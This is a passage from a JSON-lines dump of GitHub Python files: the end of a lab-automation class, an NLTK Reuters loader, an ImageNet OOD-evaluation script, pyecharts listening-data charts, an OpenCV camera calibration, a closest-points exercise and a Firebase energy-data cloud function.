None:\r\n \"\"\"\r\n Closes any open queues\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n if self.ui_queue is not None:\r\n self.ui_queue.close()\r\n if self.flab_queue is not None:\r\n self.flab_queue.close()\r\n except Exception as e:\r\n self.display('Error in Flab.close_queues')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n def create_project_directory(self, parent_path, project_name) -> None:\r\n \"\"\"\r\n\r\n Creates a project directory with a given name at a given parent path\r\n\r\n For example, create_project_directory('C:/Projects','MyFirstProject') yields a directory\r\n with the following structure.\r\n\r\n C:/Projects/\r\n\r\n └ MyFirstProject/\r\n\r\n ├ Boot/\r\n\r\n ├ Tasks/\r\n\r\n ├ Devices/\r\n\r\n │ ├ Drivers/\r\n\r\n │ └ Protocols/\r\n\r\n ├ UIs/\r\n\r\n │ ├ Actions/\r\n\r\n │ ├ Designs/\r\n\r\n │ └ Windows/\r\n\r\n └ Bots/\r\n\r\n └ Algorithms/\r\n\r\n\r\n :param parent_path: full path of the parent directory (typically Projects)\r\n :type parent_path: str\r\n\r\n :param project_name: Name of the project\r\n :type project_name: str\r\n\r\n :return: None\r\n \"\"\"\r\n\r\n try:\r\n project_dir = parent_path + '/' + project_name\r\n device_dir = project_dir + '/' + 'Devices'\r\n ui_dir = project_dir + '/' + 'UIs'\r\n bot_dir = project_dir + '/' + 'Bots'\r\n os.mkdir(project_dir)\r\n\r\n def add_directory(path, name):\r\n os.mkdir(path + '/' + name)\r\n\r\n add_directory(project_dir, 'Boot')\r\n add_directory(project_dir, 'Devices')\r\n add_directory(device_dir, 'Drivers')\r\n add_directory(device_dir, 'Protocols')\r\n add_directory(project_dir, 'Tasks')\r\n add_directory(project_dir, 'UIs')\r\n add_directory(ui_dir, 'Actions')\r\n add_directory(ui_dir, 'Designs')\r\n add_directory(bot_dir, 'Algorithms')\r\n\r\n except Exception as e:\r\n self.display('Error in 
Flab.create_project_directory')\r\n self.display(e)\r\n\r\n finally:\r\n pass\r\n\r\n def set_working_directory(self, project_path):\r\n \"\"\"\r\n\r\n Sets the current working directory to a given path\r\n\r\n :param project_path: the full path\r\n :type project_path: str\r\n\r\n :return: None\r\n \"\"\"\r\n try:\r\n os.chdir(project_path)\r\n cwd = os.getcwd()\r\n par1 = os.path.abspath(os.path.join(cwd, '..'))\r\n par2 = os.path.abspath(os.path.join(par1, '..'))\r\n sys.path.append(par2)\r\n except Exception as e:\r\n self.display('Error in Flab.set_working_directory')\r\n self.display(e)\r\n finally:\r\n pass\r\n\r\n def get_namespace(self):\r\n \"\"\"\r\n returns a representation of the Flab object's attributes and contained devices, tasks, etc.\r\n\r\n :return: FlabNamespace\r\n \"\"\"\r\n try:\r\n namespace = FlabNamespace()\r\n namespace.devices = self.devices.keys()\r\n namespace.tasks = self.tasks.keys()\r\n namespace.bots = self.bots.keys()\r\n namespace.vars = self.vars.copy()\r\n namespace.modules = self.modules.keys()\r\n namespace.uis = self.uis.keys()\r\n namespace.print_status = self.print_status\r\n namespace.is_running = self.is_running\r\n namespace.running_tasks = self.get_running_task_names()\r\n\r\n # getting task arguments and descriptions\r\n namespace.task_args = {}\r\n namespace.task_arg_descriptions = {}\r\n for task_name in namespace.tasks:\r\n namespace.task_args[task_name] = inspect.getfullargspec(self.tasks[task_name].run)\r\n full_args = namespace.task_args[task_name]\r\n if len(full_args) > 1:\r\n args_list = full_args.args[1:]\r\n arg_list = []\r\n opt_arg_list = []\r\n for a in args_list:\r\n if 'argument_descriptions' in dir(self.tasks[task_name]):\r\n namespace.task_arg_descriptions[task_name] = {}\r\n namespace.task_arg_descriptions[task_name] = self.tasks[task_name].argument_descriptions\r\n\r\n # getting device attributes, methods, arguments, descriptions\r\n namespace.device_attributes = {}\r\n namespace.device_methods = {}\r\n namespace.device_method_args = {}\r\n namespace.device_method_arg_descriptions = {}\r\n\r\n if len(namespace.devices) > 0:\r\n for i in namespace.devices:\r\n attribute_list = self.devices[i].list_attributes()\r\n method_list = self.devices[i].list_methods()\r\n namespace.device_attributes[i] = attribute_list\r\n namespace.device_methods[i] = method_list\r\n\r\n # getting the arguments and argument descriptions for each device method\r\n for device_name in namespace.devices:\r\n namespace.device_method_args[device_name] = {}\r\n namespace.device_method_arg_descriptions[device_name] = {}\r\n for method_name in namespace.device_methods[device_name]:\r\n full_args = self.devices[device_name].list_method_args(method_name)\r\n args_list = full_args.args[1:]\r\n namespace.device_method_args[device_name][method_name] = args_list\r\n namespace.device_method_arg_descriptions[device_name][method_name] = {}\r\n if 'argument_descriptions' in dir(self.devices[device_name]):\r\n for arg in args_list:\r\n namespace.device_method_arg_descriptions[device_name][method_name][arg] \\\r\n = self.devices[device_name].argument_descriptions[arg]\r\n else:\r\n for arg in args_list:\r\n namespace.device_method_arg_descriptions[device_name][method_name][arg] = str(arg)\r\n except Exception as e:\r\n if self.print_status:\r\n print('Error in Flab.get_namespace')\r\n print(e)\r\n namespace = None\r\n finally:\r\n return namespace\r\n\r\n\r\nclass FlabNamespace:\r\n \"\"\"\r\n A namespace for a Flab object which contains the information on the contained 
objects (e.g. Devices, Tasks,\r\n variables)\r\n \"\"\"\r\n\r\n def __init__(self) -> None:\r\n \"\"\"\r\n The constructor defines the namespace attributes with the following code:\r\n ::\r\n\r\n self.devices = []\r\n self.tasks = []\r\n self.bots = []\r\n self.vars = []\r\n self.modules = []\r\n self.uis = []\r\n self.print_status = []\r\n self.is_running = []\r\n self.running_tasks = []\r\n self.device_attributes = {}\r\n self.device_methods = {}\r\n self.device_method_args = {}\r\n self.device_method_arg_descriptions = {}\r\n\r\n \"\"\"\r\n\r\n self.devices = []\r\n self.tasks = []\r\n self.bots = []\r\n self.vars = []\r\n self.modules = []\r\n self.uis = []\r\n self.print_status = []\r\n self.is_running = []\r\n self.running_tasks = []\r\n self.device_attributes = {}\r\n self.device_methods = {}\r\n self.device_method_args = {}\r\n self.device_method_arg_descriptions = {}\r\n","repo_name":"njoseGIT/flab","sub_path":"flab/Flab.py","file_name":"Flab.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31236157238","text":"\"\"\" Access to categories and documents in NLTK corpora.\n See https://www.nltk.org/book/ch02.html for details.\n Add required classes using NLTK as template for other corpuses if needed.\n\"\"\"\n\nfrom nltk.corpus import reuters\nimport nltk\nimport logging\nfrom .doc_base import DocBase\n\n\nclass NLTK_Reuters_src(DocBase):\n def __init__(self, _):\n nltk.download('reuters')\n from nltk.corpus import reuters\n self._log = logging.getLogger(self.__class__.__name__)\n\n @property\n def categories(self):\n \"\"\" returns a tuple of categories names \"\"\"\n return reuters.categories()\n\n def doc_by_category(self, cat, stype='train'):\n super()._check_set_type(stype)\n doc_ids = reuters.fileids(cat)\n doc_ids_stype = [elem for elem in doc_ids if elem.startswith(stype)]\n doc_set = []\n for doc_id in doc_ids_stype:\n txt = reuters.raw(fileids=doc_id)\n doc_set.append(txt)\n self._log.debug('found %d documents in the category \"%s\", set type \"%s\"',\n len(doc_ids), cat, stype)\n return doc_set\n","repo_name":"rtaubes/news-time-series","sub_path":"modules/nltk_reuters_src.py","file_name":"nltk_reuters_src.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69841471788","text":"import numpy as np\nimport sys\nimport os\nimport pickle\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as trn\n\nfrom resnet import ResNet_Model\n\nparser = argparse.ArgumentParser(description='Evaluates a CIFAR OOD Detector',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n# Setup\nparser.add_argument('--test_bs', type=int, default=160)\nparser.add_argument('--num_to_avg', type=int, default=1, help='Average measures across num_to_avg runs.')\nparser.add_argument('--validate', '-v', action='store_true', help='Evaluate performance on validation distributions.')\nparser.add_argument('--use_xent', '-x', action='store_true', help='Use cross entropy scoring instead of the MSP.')\nparser.add_argument('--method_name', '-m', type=str, default='cifar10_allconv_baseline', help='Method name.')\n# Loading details\nparser.add_argument('--layers', default=40, type=int, help='total number of layers')\nparser.add_argument('--widen-factor', default=2, type=int, help='widen 
factor')\nparser.add_argument('--droprate', default=0.3, type=float, help='dropout probability')\nparser.add_argument('--load', '-l', type=str, default='./snapshots', help='Checkpoint path to resume / test.')\nparser.add_argument('--ngpu', type=int, default=1, help='0 = CPU.')\nparser.add_argument('--prefetch', type=int, default=2, help='Pre-fetching threads.')\n# EG and benchmark details\nparser.add_argument('--out_as_pos', action='store_true', help='OE define OOD data as positive.')\nparser.add_argument('--score', default='MSP', type=str, help='score options: MSP|energy')\nparser.add_argument('--T', default=1., type=float, help='temperature: energy|Odin')\nparser.add_argument('--noise', type=float, default=0, help='noise for Odin')\nparser.add_argument('--choice', type=str, default='vanilla')\nargs = parser.parse_args()\nprint(args)\n\n\n# mean and standard deviation of channels of CIFAR-10 images\nmean = [x / 255 for x in [125.3, 123.0, 113.9]]\nstd = [x / 255 for x in [63.0, 62.1, 66.7]]\n\ntest_transform = trn.Compose([trn.ToTensor(), trn.Normalize(mean, std)])\n\nnormalize = trn.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n\n\nnum_classes= 100\nnet = ResNet_Model(name='resnet34', num_classes=num_classes)\nstart_epoch = 0\n\nfrom collections import OrderedDict\ndef remove_data_parallel(old_state_dict):\n new_state_dict = OrderedDict()\n\n for k, v in old_state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n\n return new_state_dict\n\n# Restore model\nif args.load != '':\n for i in range(1000 - 1, -1, -1):\n subdir = 'energy_ft_sd'\n model_name = args.load\n\n if os.path.isfile(model_name):\n net.load_state_dict(remove_data_parallel(torch.load(model_name)))\n # net.load_state_dict(torch.load(model_name))\n print('Model restored! 
Epoch:', i)\n start_epoch = i + 1\n break\n if start_epoch == 0:\n assert False, \"could not resume \" + model_name\n\nnet.eval()\n\n\nif args.ngpu > 1:\n net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu)))\n\nif args.ngpu > 0:\n net.cuda()\n # torch.cuda.manual_seed(1)\n\ncudnn.benchmark = True # fire on all cylinders\n\n\n\ndef acc_print(test_loader):\n\n in_score, right_score, wrong_score = get_ood_scores(test_loader, in_dist=True)\n\n num_right = len(right_score)\n num_wrong = len(wrong_score)\n\n return 100 - 100 * num_wrong / (num_wrong + num_right)\n\n\n\n# #imagenet-v2\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imagenetv2/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n#imagenet-a\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imageneta/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\nid_mapping = test_data.class_to_idx\nnew_mapping = {}\nfor key in list(id_mapping.keys()):\n new_mapping[id_mapping[key]] = int(key)\n# breakpoint()\ntest_data = \\\n torchvision.datasets.ImageFolder(\n '/nobackup-slow/dataset/my_xfdu/imageneta/processed/',\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]), target_transform=lambda id: new_mapping[id])\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n\n\ntest_data = \\\n torchvision.datasets.ImageFolder(\n os.path.join('/nobackup/dataset/my_xfdu/IN100_new/', 'val'),\n trn.Compose([\n trn.Resize(256),\n trn.CenterCrop(224),\n trn.ToTensor(),\n normalize,\n ]))\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=args.test_bs, shuffle=False,\n num_workers=args.prefetch, pin_memory=True)\nprint(acc_print(test_loader))\n\n\n\n\n\n","repo_name":"deeplearning-wisc/dream-ood","sub_path":"scripts/test_ood_in100_robustness.py","file_name":"test_ood_in100_robustness.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"34249718511","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Bar, Grid, Line, Liquid, Page, Pie,Tab\nfrom pyecharts.commons.utils import JsCode\nfrom pyecharts.components import Table\nfrom pyecharts.faker import Faker\nfrom pyecharts.components import Image\nfrom pyecharts.options import ComponentTitleOpts\nimport random\n# 柱状图\ndef draw_bar_plays(data,user_id,title=\"听歌方式\"):\n \"\"\"\n 两种听歌方式\n :param plays:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_plays.html\"\n x = [\"片段播放\", \"完整播放\"]\n color = [\"#749f83\", \"#d48265\"]\n\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"用户:\"+str(user_id), y,color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),toolbox_opts=opts.ToolboxOpts())\n #.render(file_name)\n )\n return c\n\ndef draw_pie_recoder(data,user_id,title=\"用户行为占比\"):\n 
\"\"\"\n 用户行为占比\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_pie_recoder.html\"\n\n c = (\n Pie(init_opts=opts.InitOpts(width=\"500px\",height=\"300px\"))\n .add(\n \"\",\n data,\n center=[\"25%\", \"50%\"],\n )\n\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {d}% \"))\n .set_global_opts(legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"45%\", orient=\"vertical\"))\n\n )\n return c\n\ndef draw_bar_recoder(data,user_id,title = \"用户行为统计\"):\n \"\"\"\n 用户行为统计\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_recoder.html\"\n x = [\"循环播放\",\"片段播放\",\"查看评论\",\"点赞评论\",\"收藏歌曲\"]\n color = [\"#F79709\",\"#749f83\", \"#d48265\",\"#33CCCC\",\"#82C182\"]\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx][1],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"\" , y, color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),\n toolbox_opts=opts.ToolboxOpts()\n )\n # .render(file_name)\n )\n return c\n\ndef draw_line_clip(data,user_id,title = \"片段播放习惯\"):\n \"\"\"\n 片段播放习惯\n :param playhobbys:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_line_clip.html\"\n x_data = []\n for i in range(300):\n x_data.append(i)\n\n c = (\n Line()\n .add_xaxis(\n xaxis_data=x_data\n )\n .add_yaxis(\n \"palycounts\",\n data,\n symbol_size=0,\n label_opts=opts.LabelOpts(is_show=False),\n is_smooth=True\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(\n title=title, pos_left=\"center\"\n ),\n\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\"),\n datazoom_opts=[\n opts.DataZoomOpts(\n is_show=True,\n )\n ],\n xaxis_opts=opts.AxisOpts(\n type_ = \"category\",\n boundary_gap=False,\n axisline_opts=opts.AxisLineOpts(is_on_zero=True)\n ),\n yaxis_opts=opts.AxisOpts(name=\"playcounts\"),\n legend_opts=opts.LegendOpts(pos_left=\"left\"),\n toolbox_opts=opts.ToolboxOpts(\n is_show=True,\n feature={\n \"dataZoom\": {\"yAxisIndex\": \"none\"},\n \"restore\": {},\n \"saveAsImage\": {},\n },\n ),\n )\n #.render(file_name)\n )\n return c\n\ndef draw_pie_like(data,user_id,title=\"偏爱曲风比重\"):\n \"\"\"\n 圆饼图 偏爱歌曲比重\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_pie_like.html\"\n c = (\n Pie()\n .add(\n \"\",\n data,\n radius=[\"30%\", \"55%\"],\n label_opts=opts.LabelOpts(\n position=\"outside\",\n formatter=\"{b}: {d}% \",\n ),\n center=[\"25%\", \"50%\"],\n )\n .set_global_opts(\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"45%\", orient=\"vertical\")\n )\n #.render(file_name)\n )\n return c\n\ndef draw_bar_like(data,user_id,title=\"偏爱曲风统计\"):\n \"\"\"\n 柱状图 偏爱统计\n :param data:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_bar_like.html\"\n x = [\"古风\", \"古典\", \"电子\", \"民谣\", \"流行\", \"说唱\", \"摇滚\"]\n color = [\"#C43C3C\", \"#7D573E\", \"#E6E65D\", \"#69DA69\", \"#70D4D4\", \"#9B7CC7\", \"#A2A2A2\"]\n xlen = len(x)\n y = []\n for idx, item in enumerate(x):\n y.append(\n opts.BarItem(\n name=item,\n value=data[idx][1],\n itemstyle_opts=opts.ItemStyleOpts(color=color[idx]),\n )\n )\n c = (\n Bar()\n .add_xaxis(x)\n .add_yaxis(\"\", y, color=Faker.rand_color())\n .set_global_opts(title_opts=opts.TitleOpts(title=title),\n 
toolbox_opts=opts.ToolboxOpts()\n )\n #.render(file_name)\n )\n return c\n\ndef draw_cloud(url,user_id,title = \"用户词云\"):\n image = Image()\n\n image.add(\n src=url,\n style_opts={\"width\": \"800px\", \"height\": \"500px\", \"style\": \"margin-left: 200px\"},\n )\n image.set_global_opts(\n title_opts=ComponentTitleOpts(title=title, subtitle=\"用户:\"+str(user_id))\n )\n\n return image\n\n\ndef grid_recoder(data,user_id):\n bar = draw_bar_recoder(data, user_id)\n pie = draw_pie_recoder(data, user_id)\n grid = (\n Grid(init_opts=opts.InitOpts(width=\"1400px\",height=\"500px\"))\n .add(bar, grid_opts=opts.GridOpts(pos_left=\"55%\"))\n .add(pie, grid_opts=opts.GridOpts(pos_right=\"55%\"))\n\n )\n return grid\n\ndef grid_like(data,user_id):\n bar = draw_bar_like(data, user_id)\n pie = draw_pie_like(data, user_id)\n grid = (\n Grid(init_opts=opts.InitOpts(width=\"1400px\",height=\"500px\"))\n .add(bar, grid_opts=opts.GridOpts(pos_left=\"55%\"))\n .add(pie, grid_opts=opts.GridOpts(pos_right=\"55%\"))\n\n )\n return grid\n\ndef page_plays(data1,data2,user_id):\n bar = draw_bar_plays(data1, user_id)\n line = draw_line_clip(data2, user_id)\n page = Page(layout=Page.SimplePageLayout)\n page.add(\n bar,\n line,\n )\n #page.render(\"page_simple_layout.html\")\n return page\n\ndef user_tab(data_set,user_id,title=\"用户数据分析\"):\n \"\"\"\n\n :param data_set:\n :param user_id:\n :param title:\n :return:\n \"\"\"\n file_name = \"user_data/\" + str(user_id) + \"_data.html\"\n url = \"cloud_\" + str(user_id) + \".jpg\"\n tab = Tab()\n tab.add(grid_recoder(data_set[0],user_id), \"用户行为统计\")\n tab.add(grid_like(data_set[1],user_id), \"用户偏爱分析\")\n # tab.add(page_plays(data_set[2],data_set[3],user_id), \"用户习惯\")\n tab.add(draw_bar_plays(data_set[2], user_id), \"用户播放方式\")\n tab.add(draw_line_clip(data_set[3], user_id), \"片段播放频率统计\")\n tab.add(draw_cloud(url, user_id), \"歌词词云\")\n tab.render(file_name)\n\n\n\nif __name__ == '__main__':\n print(\"-----\")\n # bar_color_demo()\n # draw_bar_plays([10,130],111)\n #\n # grid_demo()\n data_set=[]\n data = [(\"循环播放\", 3), (\"片段播放\", 2), (\"查看评论\", 1), (\"点赞评论\", 5), (\"收藏歌曲\", 3)]\n # page_recoder(data,222)\n data_set.append(data)\n data = [(\"古风\", 3), (\"古典\", 2), (\"电子\", 1), (\"民谣\", 5), (\"流行\", 3), (\"说唱\", 1), (\"摇滚\", 1)]\n data_set.append(data)\n data_set.append([110,50])\n data1 = []\n for i in range(300):\n data1.append(i)\n data_set.append(data1)\n # page_plays([110,20],data1,33)\n url = \"user_data/cloud_393361316.jpg\"\n data_set.append(url)\n user_tab(data_set,393361316)\n\n # draw_cloud(url,333)\n # data1 = []\n # for i in range(300):\n # data1.append(random.randint(0, 5))\n # draw_line_clip(data1,22222)\n # grid_demo()\n # draw_bar_plays([110,20],123)\n # draw_line_playhobby()\n # print(pyecharts.__version__)\n # draw_pie_hobby()\n # data = [(\"古风\",3),(\"古典\",2),(\"电子\",1),(\"民谣\",5),(\"流行\",3),(\"说唱\",1),(\"摇滚\",1)]\n # # draw_pie_plays([110,20],123)\n # draw_bar_like(data,123)","repo_name":"LineseWorld/Music-Classification","sub_path":"charts_tool.py","file_name":"charts_tool.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"39148802996","text":"'''\nCreated on Jan 19, 2019\n\n@author: SG0301464\n'''\n\nimport cv2\nimport numpy as np\nimport glob\nimport matplotlib.pyplot as plt\nimport os.path as path\nimport pickle\n\n\ndef distortionCorrection(calib_images_dir):\n # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n objp = 
np.zeros((6 * 9, 3), np.float32)\n objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob(path.join(calib_images_dir, 'calibration*.jpg'))\n\n # Step through the list and search for chessboard corners\n for filename in images:\n\n img = cv2.imread(filename)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)\n\n if pattern_found is True:\n objpoints.append(objp)\n imgpoints.append(corners)\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\n return ret, mtx, dist, rvecs, tvecs\n\n\ndef undistort(frame, mtx, dist):\n\n frame_undistorted = cv2.undistort(frame, mtx, dist, newCameraMatrix=mtx)\n return frame_undistorted\n\n\ndef showDisortImageToCorrectImage():\n ret, mtx, dist, rvecs, tvecs = distortionCorrection(calib_images_dir='camera_cal')\n img = cv2.imread('camera_cal/calibration1.jpg')\n img_undistorted = undistort(img, mtx, dist)\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 4))\n f.tight_layout()\n ax1.imshow(img)\n ax1.plot(580 , 173, '.')\n ax1.plot(577 , 274 , '.')\n ax1.plot(457, 269, '.')\n ax1.plot(463, 160, '.')\n ax1.set_title('Original Image', fontsize=10)\n ax2.imshow(img_undistorted)\n ax2.set_title('Undistorted and Warped Image', fontsize=10)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n\nif __name__ == '__main__':\n showDisortImageToCorrectImage()\n\n# cv2.imwrite('img/test_calibration_before.jpg', img)\n# cv2.imwrite('img/test_calibration_after1.jpg', img_undistorted)\n","repo_name":"mukeshk05/Advanced-Lane-Finding","sub_path":"Project2_1.py","file_name":"Project2_1.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22109977162","text":"\"\"\"\n CLOSEST K POINTS TO ORIGIN\n\n Given a list of points in the form [(X1, Y1), X2, Y2), ... 
, (XN-1, YN-1), (XN, YN)], and an integer k, write a\n function that returns the k nearest points to the origin (0, 0).\n\n Example:\n Input = [(-2, 4), (0, -2), (-1, 0), (3, 5), (-2, -3), (3, 2)], 3\n Output = [(-2, 4), (0, -2), (-1, 0)]\n\n NOTE: Variations on this program could include:\n - K nearest points to a specified (non-origin) point.\n\"\"\"\nimport heapq\nimport math\n\n\n# Iterative Approach using a Max Heap (of size k): The runtime is O(n + (n - k)log(k)), and space is O(k).\ndef closest_k_points_to_origin(l, k):\n if k == len(l):\n return l\n elif k < len(l):\n max_heap = []\n for (x, y) in l[0:k]:\n max_heap.append((-dist_between_two_points(x, y, 0, 0), (x, y)))\n heapq.heapify(max_heap)\n for (x, y) in l[k:]:\n dist = -dist_between_two_points(x, y, 0, 0)\n if dist < max_heap[0][0]:\n heapq.heappushpop(max_heap, (dist, (x, y)))\n return [p for _, p in heapq.nsmallest(k, max_heap)]\n\n\ndef dist_between_two_points(x1, y1, x2, y2):\n return math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n\n\nprint(closest_k_points_to_origin([(-2, 4), (0, -2), (-1, 0), (3, 5), (-2, -3), (3, 2)], 3))\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/math/closest_k_points_to_origin.py","file_name":"closest_k_points_to_origin.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32063929261","text":"import datetime\nimport time\nfrom firebase_admin import firestore, initialize_app\n\ntimes = {}\n\nstart = time.time()\n\n# Initialize Firestore DB\ninitialize_app()\ndb = firestore.client()\n\nend = time.time()\ntimes['db'] = end - start\n\ndef measure_time(func):\n def wrap(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n\n times[func.__name__] = end - start\n # print(func.__name__, end - start)\n return result\n\n return wrap\n\n@measure_time\ndef query_energy_data(zone_code: [int], date_from: str, duration: int, join: bool, light: bool) -> [dict]:\n\n # Initialize dicts which will be used for join\n reference_zones = {}\n resolution_codes = {}\n\n # Refactor DateTimes from string to date object and calculate the \"date_to\"\n date_from = datetime.datetime.strptime(date_from, '%d-%m-%Y')\n date_to = date_from + datetime.timedelta(days=duration)\n\n # Query Data from Firestore\n data_ref = db.collection(u'total_load_data')\n query = data_ref \\\n .where(u'entsoeAreaReference_FK', u'in', zone_code) \\\n .where(u'DateTime', u'>=', date_from) \\\n .where(u'DateTime', u'<=', date_to)\n # .order_by(u'time')\n results = query.stream()\n\n # Join energy data with information about resolution codes and reference zones\n final = []\n for result in results:\n doc = result.to_dict()\n\n if join:\n # Join Reference Zone (caching technique)\n zone_code = doc['entsoeAreaReference_FK']\n if zone_code not in reference_zones.keys():\n ref_zone_doc = db.collection('reference-zones').document(str(zone_code)).get().to_dict()\n reference_zones[zone_code] = ref_zone_doc\n doc['ReferenceZoneInfo'] = reference_zones[zone_code]\n\n # Join Resolution Codes (caching technique)\n resolution_code = doc['ResolutionCode_FK']\n if resolution_code not in resolution_codes.keys():\n res_code_doc = db.collection('resolution_codes').document(\n str(resolution_code)).get().to_dict()\n resolution_codes[resolution_code] = res_code_doc\n doc['ResolutionCodeInfo'] = resolution_codes[resolution_code]\n\n if light:\n keys = ['TotalLoadValue',\n 'DateTime',\n 'ResolutionCode_FK',\n 
'ResolutionCodeInfo',\n 'entsoeAreaReference_FK',\n 'ReferenceZoneInfo']\n doc = {k: v for k, v in doc.items() if k in keys}\n\n final.append(doc)\n\n return final\n\n@measure_time\ndef energy_data(request):\n\n if request.method == 'POST':\n\n # Get parameters\n payload = request.get_json()\n zone_codes = payload['zone_codes']\n date_from = payload['date_from']\n duration = payload['duration']\n join = payload['join']\n light = payload['light']\n\n # Get data\n data = query_energy_data(zone_codes, date_from, duration, join, light)\n\n # Make them JSON serializable\n for i in range(len(data)):\n doc = data[i]\n\n # Refactor datetime from str to date-objects\n datetime_keys = ['EntityCreatedAt', 'EntityModifiedAt', 'DateTime', 'UpdateTime']\n for key in datetime_keys:\n if key in doc.keys():\n data[i][key] = str(doc[key])\n\n if payload['join']:\n data[i]['ReferenceZoneInfo']['AreaRefAddedOn'] = str(doc['ReferenceZoneInfo']['AreaRefAddedOn'])\n data[i]['ResolutionCodeInfo']['EntityCreatedAt'] = str(doc['ResolutionCodeInfo']['EntityCreatedAt'])\n data[i]['ResolutionCodeInfo']['EntityModifiedAt'] = str(doc['ResolutionCodeInfo']['EntityModifiedAt'])\n\n return {\n 'times': times,\n 'parameters': payload,\n 'len_of_data': len(data),\n 'data': data\n }\n\n if request.method == 'GET':\n\n # Get query parameters\n zone_code = request.args.get('zone_code', default=None, type=str)\n date_from = request.args.get('date_from', default='01-10-2020', type=str)\n duration = request.args.get('duration', default='10', type=str)\n\n if zone_code is None:\n return \"Zone Code needed.\", 400\n\n # Get data\n data = query_energy_data([int(zone_code)], date_from, int(duration), False, True)\n\n # Make them JSON serializable\n for i in range(len(data)):\n doc = data[i]\n\n # Refactor datetime from str to date-objects\n datetime_keys = ['EntityCreatedAt', 'EntityModifiedAt', 'DateTime', 'UpdateTime']\n for key in datetime_keys:\n if key in doc.keys():\n data[i][key] = str(doc[key])\n\n return {\n 'times': times,\n 'parameters': {\n 'zone_code': zone_code,\n 'date_from': date_from,\n 'duration': duration\n },\n 'len_of_data': len(data),\n 'data': data\n }\n","repo_name":"Cloud-Engineering-Softlab-Project/Firebase-CloudFunctions-poly","sub_path":"energy-data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18259024270","text":"from ...core import ApiRequestFailedException\n\nclass NodeSyncState:\n 